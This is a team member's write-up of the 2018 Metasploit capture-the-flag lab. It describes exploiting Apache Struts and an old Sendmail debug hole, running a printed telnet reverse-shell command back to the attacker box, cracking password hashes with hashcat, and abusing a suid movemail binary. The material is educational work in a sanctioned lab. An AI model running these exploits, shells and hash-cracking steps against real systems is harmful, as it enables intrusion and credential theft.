Metaspoit CTF 2018 Writeup
So just recently, I participated in the 2018 Metasploit CTF. I got some flags, created some shells with my team, and had some fun. It ranged from being difficult in certain challenges and some being really straightforward. We ended up getting about 5 flags (I know, not a whole lot but this was my first time participating in a CTF like this) and I feel very accomplished of myself and my team on how much we did. I defenetly will be doing this CTF next year as it's a very good one, and I learned a lot with it. The following methods used to acquire the flags below were in collaboration with the team (B0rn2r00t, jetson23, Nukez, T, and fir, thank you guys) and is not solely my work. All credit goes to everyone involved in the CTF team.
Configuration
The CTF was organized in a very interesting way. There are three boxes in total, two were targets (one being a Windows interface and one being a Linux interface) and to be able to attack these targets, you had to access them through a Kali Linux box that was provided to you through a given IP. Once connected to this box we can then go ahead and attack the targets through the terminal given. (Although I did not realize this until after the competition, you could configure proxychains in the Kali box to be able to use tools outside of the box instead of being limited to the provided CLI and tools.)
3 of Clubs
The three of clubs was a very simple challenge. This one could be found by simply reading the entire rules on the CTF site. Once you do, you will find a line that will look like this
Upon looking at this, it tells us to go to a website on the Linux machine hosted on port 31063. We can access this through a terminal program known as links.
links http://172.16.28.38:31063
Once the page loads up, we are immediately asked how to describe the reward we are seeking in one word in a text field below. If we read the rules, it mentions a splendiferous reward that is to be found on this server. If we take a look at the source, it takes what we input into the field, adds .png at the end of it and treats it as a URL.
Therefore, we can just use a simple wget request to get our flag
wget http://172.16.28.38:31063/splendiferous.png
And the three of clubs is now ours!
10 of Hearts
From here, we decided to run a port scan on the Ubuntu machine. We tried the windows machine but we were unable to get any flags from it, so there won't be any information about it here. The following was the output of the scan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 08:16 UTCNmap scan report for 172.16.28.37Host is up (0.0046s latency).Not shown: 994 closed portsPORT STATE SERVICE25/tcp open smtp79/tcp open finger2222/tcp open EtherNetIP-18080/tcp open http-proxy8181/tcp open intermapper8443/tcp open https-alt
Reading this, we can see that there is an http service running on port 8080, after further analysis, it appears to be an Apache Struts instance.
8080/tcp open http-proxy|_http-open-proxy: Proxy might be redirecting requests| http-title: Struts2 Showcase|_Requested resource was showcase.action
Through further analysis, we figured out that the version of the Struts instance is running 2.3.x and thankfully, there is an exploit available on Metasploit. The module's name is exploit/multi/http/struts2_code_exec_showcase. We proceeded to exploit it and used the payload cmd/unix/reverse_bash.
The options we used are below:
Module options (exploit/multi/http/struts2_code_exec_showcase):Name Current Setting Required Description---- --------------- -------- -----------POSTPARAM name yes The HTTP POST parameterProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS 172.16.28.37 yes The target address range or CIDR identifierRPORT 8080 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI /integration/saveGangster.action yes The path to a struts application actionVHOST no HTTP server virtual hostPayload options (cmd/unix/reverse_bash):Name Current Setting Required Description---- --------------- -------- -----------LHOST 172.16.28.36 yes The listen address (an interface may be specified)LPORT 9010 yes The listen portExploit target:Id Name-- ----0 Universal
We happened to get a shell with this, but now we must hunt down for the flag. Luckily, we were able to find it in the directory /usr/local/tomcat/tmp. Upon looking in here we were able to find the 10 of hearts.
cd /usr/local/tomcat/tmpls -altotal 328drwxr-xr-x 2 root root 4096 Nov 26 20:43 .drwxr-xr-x 19 root root 4096 Dec 1 06:01 ..-rwxr--r-- 1 root root 326794 Nov 26 20:42 10_of_hearts
2 of Diamonds
This flag was a difficult one, as it involved a lot of different things to be done to get the flag. When we did our Nmap scan we noticed port 25 was open and running an SMTP server. We decided to see if we can find an open relay on the server, and sure enough, there was.
msf5 auxiliary(scanner/smtp/smtp_relay) > exploit[+] 172.16.28.37:25 - SMTP 220 2-of-diamonds Sendmail 5.51/5.17 ready at Mon, 1 Dec 86 03:02:45 PST\x0d\x0a[*] 172.16.28.37:25 - "500 Command unrecognized\r\n"[*] 172.16.28.37:25 - "250 <sender@example.com>... Sender ok\r\n"[*] 172.16.28.37:25 - "250 <target@example.com>... Recipient ok\r\n"[*] 172.16.28.37:25 - "354 Enter mail, end with \".\" on a line by itself\r\n"[*] 172.16.28.37:25 - "250 Ok\r\n"[+] 172.16.28.37:25 - Potential open SMTP relay detected: - MAIL FROM:<sender@example.com> -> RCPT TO:<target@example.com>[*] 172.16.28.37:25 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
Using another module, we also found out that the SMTP server was a Sendmail 5.51/5.17 server. Just like the 10 of hearts, there is an exploit for this specific version. We then searched for anything related to sendmail and got these results.
Matching Modules================Name Disclosure Date Rank Check Description---- --------------- ---- ----- -----------auxiliary/dos/smtp/sendmail_prescan 2003-09-17 normal No Sendmail SMTP Address prescan Memory Corruptionexploit/linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Executionexploit/multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injectionexploit/solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Executionexploit/unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Executionexploit/unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escapepost/linux/gather/enum_configs normal No Linux Gather Configurations
There is one big detail that helped us in determining which exploit to use. Seeing the timestamp from the earlier relay scan, it mentions that it was ready at December 1, 1986, which when we look at the disclosure dates next to the modules, we can see that in 1988-11-02 the Morris Worm was disclosed. We decided to go with this module along with the cmd/unix/reverse payload. Thankfully we were successful.
msf5 exploit(unix/smtp/morris_sendmail_debug) > exploit[*] Started reverse TCP double handler on 172.16.28.36:4444[*] 172.16.28.37:25 - Connecting to sendmail[*] 172.16.28.37:25 - Enabling debug mode and sending exploit[*] 172.16.28.37:25 - Sending: DEBUG[*] 172.16.28.37:25 - Sending: MAIL FROM:<Br3XVjJuaJpXYManvhOxBXuwv>[*] 172.16.28.37:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">[*] 172.16.28.37:25 - Sending: DATA[*] 172.16.28.37:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc[*] 172.16.28.37:25 - Sending: export PATH[*] 172.16.28.37:25 - Sending: sh -c '(sleep 3655|telnet 172.16.28.36 4444|while : ; do sh && break; done 2>&1|telnet 172.16.28.36 4444 >/dev/null 2>&1 &)'[*] 172.16.28.37:25 - Sending: .[*] 172.16.28.37:25 - Sending: QUIT[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo oq9MvZlFwNKDbXzN;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"[*] Matching...[*] B is input...[*] Command shell session 1 opened (172.16.28.36:4444 -> 172.16.28.37:48210) at 2018-12-01 11:06:29 +0000
We don't seem to be root in the system, so let us go ahead and see if we can get some password hashes. Using cat /etc/passwd we manage to get some password hashes, and we are done with our shell. We put the hashes into hash-identifier and it tells us that it is using the DES hash algorithm. Using hashcat with the rockyou wordlist, we were able to crack the hashes.
ec2-user@kali:~/ubuntu$ hashcat -m 1500 hashes --wordlist /usr/share/wordlists/rockyou.txt --forceFA/4weg1/wy2c:biteme ghgOciUqGHcs9YOw:fatcat tefs.EZm/wQTqbro:whocares ralphNYqgD2jjeuozk:hacker ShannonhnZ1ZK5H2qapE:lancelot miriamuxxJaRZvgyiPg:fun rich6l7zMyp8dZLZU:foobar ckusickYd6H6R7ejeIP2:raygun sam.6s.pzMqjyMrU:haring jimSTpwu/Ggmk78A:noexit van
We now can login with these credentials, but we are not able to access a certain folder, namely /etc/guest/hunter. When we ran his hash in hashcat, it wasn't successful with the rockyou wordlist, so we had to do a brute-force attack.
hashcat -m 1500 IE4EHKRqf6Wvo -a 3 ?1?1?1?1?1?1?1 -i --increment-min=6 --forceIE4EHKRqf6Wvo:msfhack hunter
Thankfully, it was successful and we find the password to be msfhack. Using this we switch to hunter to access his folder. Upon access, we find the movemail program is in there which also happens to have a suid of root, allowing us to copy any file in the system. Using this we copied over the 2 of Diamonds.
movemail /usr/games/lib/2_of_diamonds.dat /usr/guest/2_of_diamonds.dat
Unfortunately, it's encrypted and unreadable but while poking around, we found an adventure file. Of course, we copied it over.
movemail /usr/games/adventure /usr/hunter/adventure
We made the adventure file executable and ran it. I will spare the details since it takes a while but once you complete it, you will get a password to decrypt the 2 of Diamonds.
5 of Spades
To get the 5 of Spades, you simply needed to poke around in Metasploit a bit. Once we did, we found a very interesting module called exploit/multi/ctf/flag. Using it outputs this:
5_of_spades is at http://host-ip:9021/0.png
All we have to do is initiate a wget request, and the flag is ours.
8 of Diamonds
To find the 8 of diamonds, we must look at a service running on port 8181. Upon further investigation, it seems to be running an http server. Using wget, we can download the webpage and analyze it locally on the console.
wget http://172.16.28.37:8181/ -o page.html
Upon investigation of the html site, there seems to be some JS code found in the file. Upon further analysis, it seems to be obfuscated under IlluminateJS. We can easily use https://illuminatejs.com/ and paste the obfuscated code into the site to be decrypted.
Once we do, it outputs some ciphertext encoded in base64. All we have to do is copy this into a text file and decrypt it
base64 -d flag.txt flag
Once we do, it outputs a png file which just so happens to be our flag!
Again, this CTF was very interesting and educating to both me and my team. I would like to thank my teammates and Rapid7 for this CTF. Without them, I could not do most of the things in this CTF. I hope and expect to do this again next year.
Until then...